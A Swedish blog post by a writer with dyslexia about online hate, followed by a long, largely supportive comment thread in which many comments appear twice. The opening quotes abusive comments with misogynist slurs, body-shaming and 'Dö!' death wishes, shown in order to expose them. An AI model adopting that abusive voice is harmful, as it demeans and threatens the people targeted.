Ja, jag har Dyslexi!

 

image

HAHA! Vem är så dum att man anställer en dyslexi fitta som skribent på Hälsa & Fitness! Hahahaha! Den karriärren lär inte bli lång. SÅ pinsamt för tidningen. My på riktgt finns det någonting du gör som är rätt?

Att leva med dyslexi! 

Här ser ni några av alla kommentarer jag får gällande dyslexi. 

Jävla bloggtönt! Sluta blogga gå en svenska kurs! Du är ju pinsam! Min son på 5 år skriver 
bättre än du! Inte nog med att du inte kan skriva, du är ful och tjock också!
Alltså förelåt! MEN snälla rara du, om du nu ska blogga så måste du väl ändå kunna stava?! HUR kan din portal vilja ha dig? Man förstår knappt vad du skriver!
Du skriver att du har dyslexi. Men My är det inte bara slarvfel? Finns det inte rättstavningsprogram för såna som du? Jag menar inget illa. Men man orkar inte läsa din 
inlägg, jag som själv jobbar som lärare är en riktig rättstavningspolis. Ni bloggare ska ju vara förebilder, inte tvärt om?
Men WHAT!? Inte ett rätt!? särskrivning deluxe! Så pinsam! Lägg ner din patetiska blogg! 
Börja skolan, plugga, studera, utbilda dig och lär dig svenska språket!
Dö bloggfitta! DÖ!!!!!!!!! Du kan fan inte påstå att du är en seriös bloggare om du inte ens kan skriva ETT ENDA inlägg utan 75 stavfel?! hahaha! Skribent för Hälsa & Fitness? VILKET SKÄM DU ÄR! Pinsamt!! Stackars din son som har en sån idiot till mamma! Hoppas hans pappa är smartare än du!

Hej fina!

Detta inlägget har jag haft ganska svårt för att skriva. Men jag tycker att det är viktigt att lyfta fram att det inte är så farligt att vara dyslektiker. INGEN har rätt att kränka, eller ge sig på en person pga av dyslexi. 👊🏻👊🏻💪🏻

Detta är bara en bråkdel av alla hat kommentarer jag får angående min dyslexi. Jag har dyslexi. Min mamma har dyslexi. MÅNGA har dyslexi.

IMG_8846 IMG_8868

Jag har t.o.m skrivit i min intro text att jag har dyslexi. Inte för att få sympati. Utan av två andra anledningar. För det första, för att förekomma liknande kommentarer som dom jag låter er läsa ovan.  Jag VET att jag inte alltid skivar rätt. Ibland är det särdrivningar, rena felstavningar och ”huller om buller” omkastade meningar.

Jag BER om URSÄKT för det. Men jag gör verkligen så gott jag kan, utefter MINA förutsässningar! 🌺

Jag har både på mobilen ett rättstavningsprogram där den dessutom plötsligt stavar om ett helt ord. Ett exempel, GREJER kan snabbt slå om och bli GREKER.

DET kan bli väldet tokigt ibland. Jag minns en gång för något år sedan som jag skrev en rubrik gällande min son. Jag skrev något i stil med ”Min älskade söt nöt” Istället för sötnöt i ett ord.🙈 Snabbs så haglade kommentarer med hån och elakheters in…

-Varför?

DET är ett klassiskt fel jag brukar göra. Just det inlägget hånades jag verkligen för.jag kommer ihåg.  Jag kommer ihåg känslan, kan nästan ”ta” på den Jag blev röd om kinderna, det hettade till av skam. jag skämdes! 

Jag har genom mina år och min bloggkarriär försökt att bemöta det med ett leende och ett skratt och framförallt en rejäl dos med självdistans. Jag kan gå igenom samma blogginlägg både en, två och TRE gånger. UTAN att hitta alla stavfel. Jag ser dom inte. jag lägger alltså mellan 1,2 till 3 gånger så lång tid som en person utan dyslexi gör på samma sak. UTAN förbättring.😌

Eller iallfall utan att få till det rätt. Jag VET att det retar gallfeber på vissa att man inte kan stava och utrycka sig korrekt utefter vårat svenska språk.

MEN i dagens social medier så har man alltid ett val. OM man retar sig på mig av just den anledningen. Då är det ju bara att sluta läsa min blogg. Valet är trots allt upp till läsaren. 

Jag är inte ute efter att förpesta någons dag eller irritera någon. TVÄRT OM! jag vill sprida pepp, inspiration och låter alla som vill vara en del av mig och min blogga att vara det  ❤

Jag upplever MIN dyslexi som att texten hoppar runt. Jag har väldigt svårt för att koncentrera mig och fokusera. När jag gick i högstadiet så hade jag jätte problem me det skriftliga. Men jag hade betydligt större framgång på muntliga presentationer. DET gick hur bra som helst. Då fick jag MVG Istället för IG (Betygen hette så på min tid) 

IMG_8863Enligt Svenska dyslexiföreningen lider mellan fem och åtta procent av Sveriges befolkning av dyslexi. Men för den som inte själv har diagnosen kan det vara svårt att föreställa sig hur det är.

man kan konstatera att upplevelsen av att ha dyslexi är väldigt individuell. Här kan ni läsa våran egna prins ord om det…❤

Jag tycker detta är ett viktigt ämne att lyfta fram. Det är ingenting att skämma över! Vad jag egentligen vill ha sagt med detta inlägget är bla till all er andra som OCKSÅ har dyslexi… -Låt det INTE begränsa dig! Var dig själv och gör det bästa av dina förutsättningar! Låt INGEN trycka ner dig pga av dyslexi!👊🏻💪🏻

Se på mig, jag jobbar både som skribent och är med blogg…. man får dyslexin och en del skratt på köpet 😉😂

Skulle bli glad om du ville DELA detta inlägget på din Facebook! För att sprida detta budskap!🙏🏻

Kram /My Martens

image

125 Komentarer

 1. Fy så hemskt att läsa såna här elakheter. Det är typiskt för sk osynliga handikapp.
  Folks totala brist på empati och förståelse lyser ofta igenom.
  Jag vet precis hur det kan vara och kännas, dels för att jag själv har ett osynligt handikapp och även för att jag har 2 vuxna barn med funktionshinder inom autismspektrat.
  Vi lever ju på 2000-talet och med all information på sociala medier så tror man ju att folk har bättre vett.
  Så fel man kan ha.
  Man förstår allt du skriver My och gör, läs vill, man inte det så jaa varför då bry sig..
  Kram till dig från mig ❤️

 2. Detta är helt sjukt . Ni som skriver dessa kommentarer … Ni har problem . Jobba med er självkänsla och skaffa er ett liv. Om ni har det så jobbigt med My och hennes texter så sluta följa bloggen.. starta en egen eller skaffa er en ny hobby

 3. Mer kärlek åt folket!
  Varför läser dom ens din blogg när dom är så negativa/hatiska….
  Du är grym som du är!!!
  Kram!

 4. Var glad att du har lätt för muntliga presentationer. Det har nog många ”stavpoliser” svårare för.
  Själv alltid haft lätt för språket i skrift, men svårare verbalt (men tränar mig o det går kanon).
  Jag tycker det är lätt att förstå vad du skriver, utan problem. Det finns ju även tester där man kan se att man till och med kan utelämna bokstäver, men ändå förstå innebörden.
  Är man lite mindre empatiskt begåvad kanske det känns viktigt att lyfta fram andras fel. Det blir så mycket lättare än att lyfta fram sina egna.
  Kram på dig!

 5. Bry dig inte om såna idiotiska kommentarer och framför allt- BE INTE OM URSÄKT! Det är ganska tydligt att det är svenska avundsjukan som kommer fram.
  Lite härligt att se att man kommenterar med att du ska lägga ner bloggen men ändå så är man nyfiken och inne och läser inläggen! ?
  Det är uppenbart att de människorna inte kan läsa en sammanhållen text och förstå dess innebörd utan de är snarare som en 7- åring som behöver bokstavera varje ord för att läsa sig igenom en mening.
  Jävla fjantar!
  Be aldrig om ursäkt för att du är du! Ingen är perfekt och man ser tydligt att det sticker i deras ögon att du har det så fint.
  ??Kramar

 6. Hej söta du! Jag blir på riktigt rädd för mänskligheten. Det är föräldrar, lärare o annat som skriver på detta vis till dig. Jag kan inte nog säga hur förundrad jag är. Säger bara fy f.n för dom!! Jag är inte dum i huvudet så jag förstår vad du menar när du skriver, lätt! Fortsätt skriv o lycka till med bloggen! Kram!

 7. Fy så hemskt att läsa såna här elakheter. Det är typiskt för sk osynliga handikapp.
  Folks totala brist på empati och förståelse lyser ofta igenom.
  Jag vet precis hur det kan vara och kännas, dels för att jag själv har ett osynligt handikapp och även för att jag har 2 vuxna barn med funktionshinder inom autismspektrat.
  Vi lever ju på 2000-talet och med all information på sociala medier så tror man ju att folk har bättre vett.
  Så fel man kan ha.
  Man förstår allt du skriver My och gör, läs vill, man inte det så jaa varför då bry sig..

  Kram till dig från mig ❤️

 8. Detta är helt sjukt . Ni som skriver dessa kommentarer … Ni har problem . Jobba med er självkänsla och skaffa er ett liv. Om ni har det så jobbigt med My och hennes texter så sluta följa bloggen.. starta en egen eller skaffa er en ny hobby

 9. Mer kärlek åt folket!
  Varför läser dom ens din blogg när dom är så negativa/hatiska….
  Du är grym som du är!!!
  Kram!

 10. Att man stavar fel är väl ändå inte hela världen, jag fattar iaf vad du menar ? men riktigt, riktigt vidrigt tycker jag det är, när mamman till femåringen, som tycker du är ful, tjock och pinsam !!! Vem skriver så ?!?!?
  Eller läraren, henne vill inte jag ha som lärare till mina barn, hon borde väl veta vad dyslexi är ???
  Så sorgligt, med så elaka människor.

  • Håller verkligen med dig! Fy så hemskt om man får en sån lärare till sina barn!! Till slut avslöjar dessa troll sig själva och blir väldigt ensamma för ingen vill vara med en elak människa. Människor som sitter och skriver sådana kommentarer mår uppenbart inte bra och är sjuka på ett eller annat sätt. Man låter sitt eget misslyckade liv gå ut över andra som mår bra och är friska och sunda, för att man tro att man ska må lite bättre själv. Det kommer de dock aldrig att göra.. Problemen sitter betydligt djupare än så hos dessa människor.

 11. Var glad att du har lätt för muntliga presentationer. Det har nog många ”stavpoliser” svårare för.

  Själv alltid haft lätt för språket i skrift, men svårare verbalt (men tränar mig o det går kanon).

  Jag tycker det är lätt att förstå vad du skriver, utan problem. Det finns ju även tester där man kan se att man till och med kan utelämna bokstäver, men ändå förstå innebörden.

  Är man lite mindre empatiskt begåvad kanske det känns viktigt att lyfta fram andras fel. Det blir så mycket lättare än att lyfta fram sina egna.

  Kram på dig!

 12. Har själv ingen dyslexi, men synskador. Extreml juskänslighet, samt synbortfall. har ofta svårt att se det som jag har skrivit. Får oftast förlita mig på att det blivit rätt. Samma när jag läser. Kan se fel i mina blogginlägg efteråt, men bryr mig inte om att ändra. Men har börjat göra det mer. Det verkar vara viktigt för läsare. Ser ofta sådan kritik på bloggar.
  Har stavningsprogram, numera.
  Inte på mobilen dock. Har legat inne på sjukhus i en vecka, så jag har inte kommenterat något. Sist jag kommenterade på din blogg med mobilen höll jag på att ramla baklänges när jag läste. Bobbys kapslar. Slicka istället för silicea, bla. Okej. Har självdistans jag med. Men undviker mobilen, grrr
  Jag störs inte alls av dina texter. Tycker att du är en begåvad skribent, med vissa stavfel. Innehållet, samt meningsuppbyggnader är ju skitbra. Podden med. Fick höra ikapp idag, eftersom jag har legat inne. hade inga hörlurar. Härligt när man är hemma och inget orkar, samt ska återhämta sig. Häftiga ni. Har du en länk till Åzas blogg. vet att du har skrivit den någon gång. Men min hjärna är tillfälligt skadad, så jag ber om den igen.
  För ca 15 år sedan jobbade jag på en trafikskola, som en slags sammordnare. En tykenöverklassunge från Djursholm hade intensivkurs. (läs, min förutfattade mening). Han var överlägsen samt bad mig att fixa hans privata angelägenheter, som taxi till hotellet exempelvis.
  En dag kom han fram till mig och ville prata. Han såg trött och osäker ut. Han försökte på bästa diskreta vis förklara att han hade dyslexi. Teorin var ett helvete för honom.
  Så jag tog in honom till personalrummet och gav honom en cocacola.
  Vi hade specialundervisning på trafikskolan, för just dyslektiker. Teoriläraren hade muntlig undervisning, som killen inte kände till. Tror det var missat på hemsidan med.
  Killen klarade teorin galant.
  Så det handlar ju lååångt ifrån intelligens.
  Jag tycker att du är så cool, som står för din dyslexi. Inte tillrättalägger och så.
  Vet när jag har pluggat på universitet, så krävs det perfektion med stavning. Då korrläser man nogrant. Men bloggar, nää. Personligen tycker jag att det blir charmigt.
  Fortsätt vara du. Annars hotar jag med att sluta läsa, hahahah.
  Kramis från ickestavningspolisenfrånett snöigtkalltgöteborg.

 13. Bry dig inte om såna idiotiska kommentarer och framför allt- BE INTE OM URSÄKT! Det är ganska tydligt att det är svenska avundsjukan som kommer fram.

  Lite härligt att se att man kommenterar med att du ska lägga ner bloggen men ändå så är man nyfiken och inne och läser inläggen! 😂

  Det är uppenbart att de människorna inte kan läsa en sammanhållen text och förstå dess innebörd utan de är snarare som en 7- åring som behöver bokstavera varje ord för att läsa sig igenom en mening.
  Jävla fjantar!
  Be aldrig om ursäkt för att du är du! Ingen är perfekt och man ser tydligt att det sticker i deras ögon att du har det så fint.

  💕💕Kramar

 14. Det är människor som du som kommer göra skillnad, fortsätt skriva, fortsätt sprid kunskap om dyslexi och näthat och framförallt -fortsätt belysa.
  Tack för att du är modig / Camilla

 15. MODIG!
  Det är vad jag skulle vilja kalla dig, modig och stark. Att ha en så stor blogg som du har samt att vara skribent för en tidning hade nog skrämt iväg många som har dyslexi. Jag tycker det är helt fantastiskt att du inte låter dyslexin begränsa dig.
  En av kommentarerna som du delade med dig av reagerade jag starkt på. En som var lärare… Hur kan en lärare sitta och kommentera att det är illa om man inte kan stava. Jag är lärare och jag tycker att det är fantastiskt att du jobbar med det du gör just för att du har dyslexi. En dålig lärare kritiserar, en bra lärare peppar… Så nu fick jag ur mig det.
  Tack för en fin och ärlig blogg!

 16. Hej söta du! Jag blir på riktigt rädd för mänskligheten. Det är föräldrar, lärare o annat som skriver på detta vis till dig. Jag kan inte nog säga hur förundrad jag är. Säger bara fy f.n för dom!! Jag är inte dum i huvudet så jag förstår vad du menar när du skriver, lätt! Fortsätt skriv o lycka till med bloggen! Kram!

 17. Att man stavar fel är väl ändå inte hela världen, jag fattar iaf vad du menar 😀 men riktigt, riktigt vidrigt tycker jag det är, när mamman till femåringen, som tycker du är ful, tjock och pinsam !!! Vem skriver så ?!?!?
  Eller läraren, henne vill inte jag ha som lärare till mina barn, hon borde väl veta vad dyslexi är ???
  Så sorgligt, med så elaka människor.

  • Håller verkligen med dig! Fy så hemskt om man får en sån lärare till sina barn!! Till slut avslöjar dessa troll sig själva och blir väldigt ensamma för ingen vill vara med en elak människa. Människor som sitter och skriver sådana kommentarer mår uppenbart inte bra och är sjuka på ett eller annat sätt. Man låter sitt eget misslyckade liv gå ut över andra som mår bra och är friska och sunda, för att man tro att man ska må lite bättre själv. Det kommer de dock aldrig att göra.. Problemen sitter betydligt djupare än så hos dessa människor.

 18. Jag kan inte fatta hur man kan göra såna inlägg!!! Varför???
  Äh, skit i dom My.
  Förresten så har du väl alltid någon som korrekturläser dina inlägg du ska göra i tidningen???
  Så vad har dessa människor för problem? dessa elaka människor som gör dyliga inlägg?
  Sorgliga människor……
  Dom borde läsa någon annan blogg istället, för här behöver dom inte vara!
  På din egen blogg gör du som du vill, vi läser och det är okej.

 19. Inget konstigt alls med din stavning….aldrig haft ngt problem att förstå…..Vad som är svårare att förstå är kommentarerna om att du är tjock & ful?!?! När du PERFEKT & SKITSNYGG
  Ren skär avundsjuka från om du frågar mig!!
  Låt inget eller ingen trycka ner dig. Du är bäst❤❤

 20. Ja My det är tråkigt när så kallat folk skriver så otäckt dumma kommentarer.
  Jag råkar ibland stava fel när jag skriver och ser jag det så ändrar jag men ibland missar jag att rätta. Det är ju inte hela världen. Den som har mest ont av det är nog dom med dom dåliga kommentarerna.
  En dålig människa ser alltid fel hos andra aldrig hos sig själv.
  Jag gillar det du skriver.
  Stå på dig snygging.
  Kram L ?

 21. Har själv ingen dyslexi, men synskador. Extreml juskänslighet, samt synbortfall. har ofta svårt att se det som jag har skrivit. Får oftast förlita mig på att det blivit rätt. Samma när jag läser. Kan se fel i mina blogginlägg efteråt, men bryr mig inte om att ändra. Men har börjat göra det mer. Det verkar vara viktigt för läsare. Ser ofta sådan kritik på bloggar.
  Har stavningsprogram, numera.
  Inte på mobilen dock. Har legat inne på sjukhus i en vecka, så jag har inte kommenterat något. Sist jag kommenterade på din blogg med mobilen höll jag på att ramla baklänges när jag läste. Bobbys kapslar. Slicka istället för silicea, bla. Okej. Har självdistans jag med. Men undviker mobilen, grrr
  Jag störs inte alls av dina texter. Tycker att du är en begåvad skribent, med vissa stavfel. Innehållet, samt meningsuppbyggnader är ju skitbra. Podden med. Fick höra ikapp idag, eftersom jag har legat inne. hade inga hörlurar. Härligt när man är hemma och inget orkar, samt ska återhämta sig. Häftiga ni. Har du en länk till Åzas blogg. vet att du har skrivit den någon gång. Men min hjärna är tillfälligt skadad, så jag ber om den igen.

  För ca 15 år sedan jobbade jag på en trafikskola, som en slags sammordnare. En tykenöverklassunge från Djursholm hade intensivkurs. (läs, min förutfattade mening). Han var överlägsen samt bad mig att fixa hans privata angelägenheter, som taxi till hotellet exempelvis.
  En dag kom han fram till mig och ville prata. Han såg trött och osäker ut. Han försökte på bästa diskreta vis förklara att han hade dyslexi. Teorin var ett helvete för honom.
  Så jag tog in honom till personalrummet och gav honom en cocacola.
  Vi hade specialundervisning på trafikskolan, för just dyslektiker. Teoriläraren hade muntlig undervisning, som killen inte kände till. Tror det var missat på hemsidan med.
  Killen klarade teorin galant.
  Så det handlar ju lååångt ifrån intelligens.
  Jag tycker att du är så cool, som står för din dyslexi. Inte tillrättalägger och så.
  Vet när jag har pluggat på universitet, så krävs det perfektion med stavning. Då korrläser man nogrant. Men bloggar, nää. Personligen tycker jag att det blir charmigt.

  Fortsätt vara du. Annars hotar jag med att sluta läsa, hahahah.
  Kramis från ickestavningspolisenfrånett snöigtkalltgöteborg.

 22. Det är människor som du som kommer göra skillnad, fortsätt skriva, fortsätt sprid kunskap om dyslexi och näthat och framförallt -fortsätt belysa.
  Tack för att du är modig / Camilla

 23. MODIG!
  Det är vad jag skulle vilja kalla dig, modig och stark. Att ha en så stor blogg som du har samt att vara skribent för en tidning hade nog skrämt iväg många som har dyslexi. Jag tycker det är helt fantastiskt att du inte låter dyslexin begränsa dig.

  En av kommentarerna som du delade med dig av reagerade jag starkt på. En som var lärare… Hur kan en lärare sitta och kommentera att det är illa om man inte kan stava. Jag är lärare och jag tycker att det är fantastiskt att du jobbar med det du gör just för att du har dyslexi. En dålig lärare kritiserar, en bra lärare peppar… Så nu fick jag ur mig det.
  Tack för en fin och ärlig blogg!

 24. Fy fan hur vidriga folk är, jag förstår inte hur man står ut med sig själv när man skriver så som de här personerna gör och du som skriver att du är lärare borde väl förstå problemet, sträck på dig My du duger som du är och det är inga problem att läsa din blogg
  Mvh. Åsa

 25. Jag kan inte fatta hur man kan göra såna inlägg!!! Varför???
  Äh, skit i dom My.
  Förresten så har du väl alltid någon som korrekturläser dina inlägg du ska göra i tidningen???
  Så vad har dessa människor för problem? dessa elaka människor som gör dyliga inlägg?
  Sorgliga människor……
  Dom borde läsa någon annan blogg istället, för här behöver dom inte vara!
  På din egen blogg gör du som du vill, vi läser och det är okej.

 26. Fruktansvärt illa och klanka ner på dyslexi. En lärare dessutom som borde veta vad det innebär. Stackars barn!
  För er som inte vet vad det innebär så gå in på hjärnfondens hemsida och läs på.
  Tycker det är strongt att ha blogg med en sån funktionsnedsättning. Tycker inte alls det är svårt att förstå vad du skriver. Stå på dig och skit i alla elaka kommentarer.
  Kan inte förstå meningen med att skriva så elaka kommentarer.

 27. Inget konstigt alls med din stavning….aldrig haft ngt problem att förstå…..Vad som är svårare att förstå är kommentarerna om att du är tjock & ful?!?! När du PERFEKT & SKITSNYGG
  Ren skär avundsjuka från om du frågar mig!!
  Låt inget eller ingen trycka ner dig. Du är bäst❤❤

 28. Ja inte konstigt att världen ser ut som den gör när lite felstavningar kan locka fram såna elaka människor… Hoppas att du vet att du duger precis som du är ! Kram

 29. Ja My det är tråkigt när så kallat folk skriver så otäckt dumma kommentarer.
  Jag råkar ibland stava fel när jag skriver och ser jag det så ändrar jag men ibland missar jag att rätta. Det är ju inte hela världen. Den som har mest ont av det är nog dom med dom dåliga kommentarerna.
  En dålig människa ser alltid fel hos andra aldrig hos sig själv.
  Jag gillar det du skriver.
  Stå på dig snygging.
  Kram L 🌷

 30. Fy fan hur vidriga folk är, jag förstår inte hur man står ut med sig själv när man skriver så som de här personerna gör och du som skriver att du är lärare borde väl förstå problemet, sträck på dig My du duger som du är och det är inga problem att läsa din blogg
  Mvh. Åsa

 31. Jag förstår inte varför människor är så elaka??!! Varför? Vad får man ut av det? Mår man verkligen bra när man försöker sänka en annan människa totalt?? Nej jag förstår inte! Men jag tycker att du My gör ett kanonjobb!! Fortsätt så!! Kram<3

 32. Om det är felstavat så förstår man ju ändå. Så vad är det att bråka om så lågt. Tänk en mamma skriver att hennes 5-åring skriver bättre men vad har denna lilla pojke för mamma som borde va en förebild så kan det ju knappast vara!! Kör ditt race fina My. Kram ?

 33. Hej My!
  Ursäkta varför bry sig om din stavning!!!!!!! Det är vell innehållet som räknas!!!!
  Dessa elaka människor mår ju inte så värst bra, de är bara avundsjuka och varför läsa din blogg överhuvud taget om de bara letar fel och ska trycka ner dig, paragrafryttare !!! Jag tycker du är grym My som är så stark och orkar fortsätta blogga med sådana elaka människor, man tror ju inte det är sant när man läser det och en lärare som inte har mer vett i huvudet, man blir ju mörkrädd!!!! Håller med föregående skrivare, skulle inte vilja
  ha henne som lärare tillmitt barn!
  GO GIRL!!!!
  Du är vacker, smart, duktig, driftig, modig och en underbar mamma till din fina son Ludvig!!!! All kärlek till dig My!!!!
  Kram Ewa

 34. Suck på dessa personer alltså!
  Tydligen är vi ju fler som inte bryr oss om något fel här och där, med tanke på din besöksstatistik. Något att lägga på minnet när liknande kommentarer kommer.
  Sen är det som att ge bort bajs i silkespapper (Elaines uttryck) när man levererar en hatisk åsikt men inleder med ”jag menar inget illa” eller ”snälla du”. Värsta sorten! Sluta läs då! Är det svårt?!

 35. Fruktansvärt illa och klanka ner på dyslexi. En lärare dessutom som borde veta vad det innebär. Stackars barn!
  För er som inte vet vad det innebär så gå in på hjärnfondens hemsida och läs på.
  Tycker det är strongt att ha blogg med en sån funktionsnedsättning. Tycker inte alls det är svårt att förstå vad du skriver. Stå på dig och skit i alla elaka kommentarer.
  Kan inte förstå meningen med att skriva så elaka kommentarer.

 36. Ja inte konstigt att världen ser ut som den gör när lite felstavningar kan locka fram såna elaka människor… Hoppas att du vet att du duger precis som du är ! Kram

 37. Jag blir faktiskt väldigt ledsen att du som är en sån stark och härlig tjej får ta så mycket skit och hat! Vad är det som gör att folk måste spy galla på detta vis? Har dom verkligen inget bättre för sig! Skrämmande!
  Jag tycker att du är så modig och stark som lyfter fram detta för dyslexi måste vara jättejobbigt att ha och att du ha en blogg trots det är ju fantastiskt.
  Kram på dig My ?

 38. Så ledsamt att höra att det på riktigt finns vuxna människor därute som uttalar sig så kränkande och nedlåtande. Det är faktiskt inte okej! Om det nu är till någon tröst så tycker jag att du ska tänka att det här med all säkerhet handlar om människor som på ett eller annat vis inte mår bra själva. Trygga personer med skapligt gott självförtroende och en god uppfostran beter sig helt enkelt inte på det viset. Det vittnar bara om deras egen dumhet, tyvärr. Försök att skaka av dig de elaka kommentarerna. Kram!

 39. Jag förstår inte varför människor är så elaka??!! Varför? Vad får man ut av det? Mår man verkligen bra när man försöker sänka en annan människa totalt?? Nej jag förstår inte! Men jag tycker att du My gör ett kanonjobb!! Fortsätt så!! Kram<3

 40. Om det är felstavat så förstår man ju ändå. Så vad är det att bråka om så lågt. Tänk en mamma skriver att hennes 5-åring skriver bättre men vad har denna lilla pojke för mamma som borde va en förebild så kan det ju knappast vara!! Kör ditt race fina My. Kram 💖

 41. Hej My!

  Ursäkta varför bry sig om din stavning!!!!!!! Det är vell innehållet som räknas!!!!
  Dessa elaka människor mår ju inte så värst bra, de är bara avundsjuka och varför läsa din blogg överhuvud taget om de bara letar fel och ska trycka ner dig, paragrafryttare !!! Jag tycker du är grym My som är så stark och orkar fortsätta blogga med sådana elaka människor, man tror ju inte det är sant när man läser det och en lärare som inte har mer vett i huvudet, man blir ju mörkrädd!!!! Håller med föregående skrivare, skulle inte vilja
  ha henne som lärare tillmitt barn!

  GO GIRL!!!!
  Du är vacker, smart, duktig, driftig, modig och en underbar mamma till din fina son Ludvig!!!! All kärlek till dig My!!!!

  Kram Ewa

 42. Sickna lumpna och elaka eländen till människokrakar som kastar sån skit omkring sig! Man blir så ledsen över att det fortfarande år 2017 finns människor som tar sig rätten att trycka ner och vara elak mot andra. Vi lever på 2000 talet nu, det borde inte finnas utrymme alls för sådant beteende. Vi borde ha utvecklats så mycket att man förstår att elakheter och ondska bara fastnar på en själv, men i annan skepnad. Jag hoppas du nångång slipper de där elakheterna och får lugn och ro. Och fortsätt självklart blogga, den som inte kan läsa vad du skriver saknar tydligen förmåga att se helheter och snöar in på detaljer. De missar allt det roliga för att de surar över något litet obetydligt. Det är dessa människor som skriker sig hesa på bloggar över glömda bilbälten, missade reflexer, saknade hjälmar och Gud förbjude: godis på en tisdag!! ? Man frågar sig ju HUR har mänskligheten överlevt i årtusenden?? ? Kram!

 43. Suck på dessa personer alltså!
  Tydligen är vi ju fler som inte bryr oss om något fel här och där, med tanke på din besöksstatistik. Något att lägga på minnet när liknande kommentarer kommer.
  Sen är det som att ge bort bajs i silkespapper (Elaines uttryck) när man levererar en hatisk åsikt men inleder med ”jag menar inget illa” eller ”snälla du”. Värsta sorten! Sluta läs då! Är det svårt?!

 44. Jag är Såå sjukt trött på alla människor som sitter bakom en display och ger spydiga och elaka kommentarer. VARFÖR?! Alla människor vi möter kämpar med nått, så va snäll, Hur svårt kan det va att behandla människor med respekt.?!
  Du är en fantastisk kvinna My, ❤❤❤ Jag önskar dig en fortsatt fin kväll. Varma hälsningar Malin

 45. Heja dig modiga fina Multimamma My? Så starkt att lyfta ämnet dyslexi som så många lever med. Särskrivningar och stavfel gör bloggen levande och inte falskt statisk. Kram till dig från mig

 46. Herregud hur elaka är människor egentligen! Förstår inte varför folk ska hoppa på dig om allt möjligt! Att ha dyslexi har ingenting med det intellektuella att göra. Det är ett väldigt hatiskt samhälle vi lever i idag! Du är så bra My & du är en go tjej! Skit i alla som är så otrevliga o spydiga. <3

 47. Vilka patetiska människor det finns. Bry dig inte om detta personer My. Om man nu stör sig på det du skriver varför läser man då? Har man inget bättre för sig än att sitta bakom ett anonymt nickname och skriva massa skit.
  Stå på dig och vi som vill följa ditt liv bryr sig inte om mindre stavfel ?

 48. Nej men fy f-n vilka hemska kommentarer My??!!
  Vidriga människor som skriver på det sättet… otroligt ledsamt och inte konstigt att vi har krig i världen…
  Kram från Fia

 49. Jag blir faktiskt väldigt ledsen att du som är en sån stark och härlig tjej får ta så mycket skit och hat! Vad är det som gör att folk måste spy galla på detta vis? Har dom verkligen inget bättre för sig! Skrämmande!

  Jag tycker att du är så modig och stark som lyfter fram detta för dyslexi måste vara jättejobbigt att ha och att du ha en blogg trots det är ju fantastiskt.
  Kram på dig My 💕

 50. Jag blir så ARG när jag läser va folk skriver så taskigt. My är underbar person ? Jag själv har samma handikapp, blir så lesen nu av att läsa detta. Jag älskar MY ❤❤❤❤❤

 51. Så ledsamt att höra att det på riktigt finns vuxna människor därute som uttalar sig så kränkande och nedlåtande. Det är faktiskt inte okej! Om det nu är till någon tröst så tycker jag att du ska tänka att det här med all säkerhet handlar om människor som på ett eller annat vis inte mår bra själva. Trygga personer med skapligt gott självförtroende och en god uppfostran beter sig helt enkelt inte på det viset. Det vittnar bara om deras egen dumhet, tyvärr. Försök att skaka av dig de elaka kommentarerna. Kram!

 52. Hej My!
  Hoppas du inte tar åt dig av de elaka kommentarerna. Svårt att kanske inte göra det men trösta dig med att HELLRE DYSLEXI än oempatisk , elak människa. Jag har hellre dyslexi 1000 gånger om än att skriva såna elakheter som en del gjort till dig. Alla de måste ha tragiska liv och upplevt massa skit som barn. Det är iof sorgligt men går att göra något åt. Människor som är elaka och måste trycka ner andra för att höja sig själva är farliga men egentligen ska vi bara tycka synd om dem. Hoppas de får hjälp och att DU står på dig och bär huvudet högt.
  Kram Em

 53. Hej jag undrar om alla dom här kommentarer står här i komentarsfältet?Läser dom flesta kommentarer men har inte sett några komentarer som dom här .Ha en bra kväll ?

 54. Hejsan, hoppas verkligen att du inte tar åt dig av dessa hemska kommentarer du får på din blogg.
  Förstår inte denna hets mot dig, varför läser dom din blogg om dom inte tycker om den……fattar ingenting faktiskt.
  Förstårr inte heller denna hets om särskrivning, visst det kan bli fel och rätt kul fel ibland men jösses man fattar ju ändå vad folk menar. Ett gott skratt förlänger livet, ta det på det sättet så blir livet mycket roligare.
  Mer värme åt folket och tänk på vilken dag det är i dag, vi kvinnor måste bli snällare mot varandra annars blir vi aldrig starka.
  Kramar från Millan

 55. Sickna lumpna och elaka eländen till människokrakar som kastar sån skit omkring sig! Man blir så ledsen över att det fortfarande år 2017 finns människor som tar sig rätten att trycka ner och vara elak mot andra. Vi lever på 2000 talet nu, det borde inte finnas utrymme alls för sådant beteende. Vi borde ha utvecklats så mycket att man förstår att elakheter och ondska bara fastnar på en själv, men i annan skepnad. Jag hoppas du nångång slipper de där elakheterna och får lugn och ro. Och fortsätt självklart blogga, den som inte kan läsa vad du skriver saknar tydligen förmåga att se helheter och snöar in på detaljer. De missar allt det roliga för att de surar över något litet obetydligt. Det är dessa människor som skriker sig hesa på bloggar över glömda bilbälten, missade reflexer, saknade hjälmar och Gud förbjude: godis på en tisdag!! 🙂 Man frågar sig ju HUR har mänskligheten överlevt i årtusenden?? 😉 Kram!

 56. Men vad är det för fel på människor så dj avundsjuka för du har lyckats så bra stå på dig och njut av att du är bäst på det du gör kramisar ? ? ? ?

 57. Jag är Såå sjukt trött på alla människor som sitter bakom en display och ger spydiga och elaka kommentarer. VARFÖR?! Alla människor vi möter kämpar med nått, så va snäll, Hur svårt kan det va att behandla människor med respekt.?!

  Du är en fantastisk kvinna My, ❤❤❤ Jag önskar dig en fortsatt fin kväll. Varma hälsningar Malin

 58. Heja dig modiga fina Multimamma My👍 Så starkt att lyfta ämnet dyslexi som så många lever med. Särskrivningar och stavfel gör bloggen levande och inte falskt statisk. Kram till dig från mig

 59. Herregud hur elaka är människor egentligen! Förstår inte varför folk ska hoppa på dig om allt möjligt! Att ha dyslexi har ingenting med det intellektuella att göra. Det är ett väldigt hatiskt samhälle vi lever i idag! Du är så bra My & du är en go tjej! Skit i alla som är så otrevliga o spydiga. <3

 60. Vilka patetiska människor det finns. Bry dig inte om detta personer My. Om man nu stör sig på det du skriver varför läser man då? Har man inget bättre för sig än att sitta bakom ett anonymt nickname och skriva massa skit.
  Stå på dig och vi som vill följa ditt liv bryr sig inte om mindre stavfel 🙂

 61. Nej men fy f-n vilka hemska kommentarer My??!!
  Vidriga människor som skriver på det sättet… otroligt ledsamt och inte konstigt att vi har krig i världen…

  Kram från Fia

 62. Att du har dyslexi har du berättat om förut och som du skrev står det i din inledning.
  Får du fortfarande sådana kommentarer från ynkliga människor som inte vet bättre!
